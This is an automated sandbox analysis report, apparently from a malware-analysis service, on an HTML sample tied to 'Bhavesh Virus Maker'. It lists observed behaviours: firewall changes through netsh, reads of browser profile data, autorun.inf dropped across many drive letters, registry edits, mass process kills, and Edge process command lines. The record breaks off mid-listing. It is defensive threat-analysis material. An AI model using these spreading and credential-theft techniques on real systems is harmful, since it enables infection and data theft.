Analysis
-
max time kernel
900s -
max time network
1176s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
24-05-2024 18:18
Static task
static1
General
-
Target
sample.html
-
Size
16KB
-
MD5
3a8fb09f8cfd8c9012520e9d45f961ba
-
SHA1
faba2dba5063476f5f8742932963249d81c5c0cb
-
SHA256
3464373dc628c72a680e4c69c3dd73c3aea0f66a8b509933f5818e516fc03985
-
SHA512
d144ba21d218fd3f77f66665577c40c048c4bc6f30efa1ad3b2e3ecc9d95eeb425dd2b02243b20410a3c3c6bf2625c342e6f6299ba48c49c648f7e2ea14d49d4
-
SSDEEP
192:x4ufWIyc+MDg9PxUfrULIAFCy8GAGYoQN6S5+MO2FHB/ibLDiTkok:x0Vig9pUfrUz8GAGM6O+x2V1i/DiTkn
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 4456 netsh.exe 2420 netsh.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops autorun.inf file 1 TTPs 64 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes:
cmd.execmd.exedescription ioc process File created \??\X:\autorun.inf cmd.exe File created \??\K:\autorun.inf cmd.exe File opened for modification \??\Q:\autorun.inf cmd.exe File opened for modification \??\R:\autorun.inf cmd.exe File created \??\W:\autorun.inf cmd.exe File created \??\H:\autorun.inf cmd.exe File opened for modification \??\E:\autorun.inf cmd.exe File created \??\U:\autorun.inf cmd.exe File created \??\H:\autorun.inf cmd.exe File created \??\S:\autorun.inf cmd.exe File opened for modification \??\T:\autorun.inf cmd.exe File opened for modification F:\autorun.inf cmd.exe File opened for modification \??\X:\autorun.inf cmd.exe File opened for modification \??\W:\autorun.inf cmd.exe File created \??\P:\autorun.inf cmd.exe File created \??\R:\autorun.inf cmd.exe File opened for modification \??\I:\autorun.inf cmd.exe File created \??\T:\autorun.inf cmd.exe File created \??\A:\autorun.inf cmd.exe File opened for modification D:\autorun.inf cmd.exe File opened for modification F:\autorun.inf cmd.exe File created \??\X:\autorun.inf cmd.exe File opened for modification \??\Z:\autorun.inf cmd.exe File created \??\A:\autorun.inf cmd.exe File opened for modification \??\P:\autorun.inf cmd.exe File opened for modification \??\G:\autorun.inf cmd.exe File opened for modification \??\J:\autorun.inf cmd.exe File created \??\V:\autorun.inf cmd.exe File created \??\Y:\autorun.inf cmd.exe File created \??\J:\autorun.inf cmd.exe File opened for modification \??\T:\autorun.inf cmd.exe File created C:\autorun.inf cmd.exe File created \??\L:\autorun.inf cmd.exe File created \??\O:\autorun.inf cmd.exe File opened for modification \??\U:\autorun.inf cmd.exe File created \??\W:\autorun.inf cmd.exe File created \??\G:\autorun.inf cmd.exe File opened for modification \??\L:\autorun.inf cmd.exe File created \??\J:\autorun.inf cmd.exe File created \??\K:\autorun.inf cmd.exe File created \??\Q:\autorun.inf cmd.exe File opened for modification \??\V:\autorun.inf cmd.exe File created \??\E:\autorun.inf cmd.exe File created \??\R:\autorun.inf cmd.exe File opened for modification \??\W:\autorun.inf cmd.exe File created \??\Z:\autorun.inf cmd.exe File opened for modification \??\B:\autorun.inf cmd.exe File opened for modification D:\autorun.inf cmd.exe File created \??\E:\autorun.inf cmd.exe File opened for modification \??\H:\autorun.inf cmd.exe File opened for modification \??\Q:\autorun.inf cmd.exe File created \??\N:\autorun.inf cmd.exe File created \??\T:\autorun.inf cmd.exe File opened for modification C:\autorun.inf cmd.exe File opened for modification \??\L:\autorun.inf cmd.exe File created D:\autorun.inf cmd.exe File opened for modification \??\P:\autorun.inf cmd.exe File created \??\I:\autorun.inf cmd.exe File opened for modification \??\X:\autorun.inf cmd.exe File created \??\Z:\autorun.inf cmd.exe File opened for modification \??\B:\autorun.inf cmd.exe File created \??\P:\autorun.inf cmd.exe File created \??\U:\autorun.inf cmd.exe File opened for modification \??\M:\autorun.inf cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 58 IoCs
Processes:
Bhavesh Virus Maker.exemsedge.exeMiniSearchHost.exemsedge.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 Bhavesh Virus Maker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\NodeSlot = "10" Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 Bhavesh Virus Maker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Documents" Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e80922b16d365937a46956b92703aca08af0000 Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "6" Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff Bhavesh Virus Maker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = ffffffff Bhavesh Virus Maker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic" Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3001105534-2705918504-2956618779-1000\{182721A0-FE68-4FCD-B4FD-FE1CDB9EE583} msedge.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" Bhavesh Virus Maker.exe Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" Bhavesh Virus Maker.exe Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg Bhavesh Virus Maker.exe Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Bhavesh Virus Maker.exe Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000004fe64bd547a1da0105a672d747a1da01c6bf36da47a1da0114000000 Bhavesh Virus Maker.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Bhavesh Virus Maker v1.0.0.1.zip:Zone.Identifier msedge.exe -
Runs .reg file with regedit 1 IoCs
Processes:
regedit.exepid process 3128 regedit.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exepid process 260 msedge.exe 260 msedge.exe 1196 msedge.exe 1196 msedge.exe 2120 identity_helper.exe 2120 identity_helper.exe 1980 msedge.exe 1980 msedge.exe 3208 msedge.exe 3208 msedge.exe 2788 msedge.exe 2788 msedge.exe 4644 tskill.exe 4644 tskill.exe 2056 tskill.exe 2056 tskill.exe 3336 tskill.exe 3336 tskill.exe 3492 tskill.exe 3492 tskill.exe 1068 tskill.exe 1068 tskill.exe 1380 tskill.exe 1380 tskill.exe 4076 tskill.exe 4076 tskill.exe 1552 tskill.exe 1552 tskill.exe 1392 tskill.exe 1392 tskill.exe 804 tskill.exe 804 tskill.exe 2072 tskill.exe 2072 tskill.exe 3728 tskill.exe 3728 tskill.exe 880 tskill.exe 880 tskill.exe 3200 tskill.exe 3200 tskill.exe 1016 tskill.exe 1016 tskill.exe 888 tskill.exe 888 tskill.exe 3232 tskill.exe 3232 tskill.exe 5116 tskill.exe 5116 tskill.exe 2780 tskill.exe 2780 tskill.exe 1924 tskill.exe 1924 tskill.exe 2044 tskill.exe 2044 tskill.exe 3972 tskill.exe 3972 tskill.exe 2364 tskill.exe 2364 tskill.exe 4868 tskill.exe 4868 tskill.exe 3160 tskill.exe 3160 tskill.exe 3512 tskill.exe 3512 tskill.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Bhavesh Virus Maker.exepid process 4320 Bhavesh Virus Maker.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
Processes:
msedge.exepid process 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe -
Suspicious use of FindShellTrayWindow 47 IoCs
Processes:
msedge.exeBhavesh Virus Maker.exepid process 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 4320 Bhavesh Virus Maker.exe 4320 Bhavesh Virus Maker.exe -
Suspicious use of SendNotifyMessage 18 IoCs
Processes:
msedge.exeBhavesh Virus Maker.exepid process 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 1196 msedge.exe 4320 Bhavesh Virus Maker.exe 4320 Bhavesh Virus Maker.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
Bhavesh Virus Maker.exeMiniSearchHost.exepid process 4320 Bhavesh Virus Maker.exe 4320 Bhavesh Virus Maker.exe 4320 Bhavesh Virus Maker.exe 4320 Bhavesh Virus Maker.exe 4320 Bhavesh Virus Maker.exe 4320 Bhavesh Virus Maker.exe 4320 Bhavesh Virus Maker.exe 4320 Bhavesh Virus Maker.exe 4320 Bhavesh Virus Maker.exe 4320 Bhavesh Virus Maker.exe 4756 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 1196 wrote to memory of 3968 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 3968 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 2420 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 260 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 260 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe PID 1196 wrote to memory of 4704 1196 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\sample.html1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff8eb03cb8,0x7fff8eb03cc8,0x7fff8eb03cd82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1924,15083796721055954176,8518631136336747507,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:22⤵
-
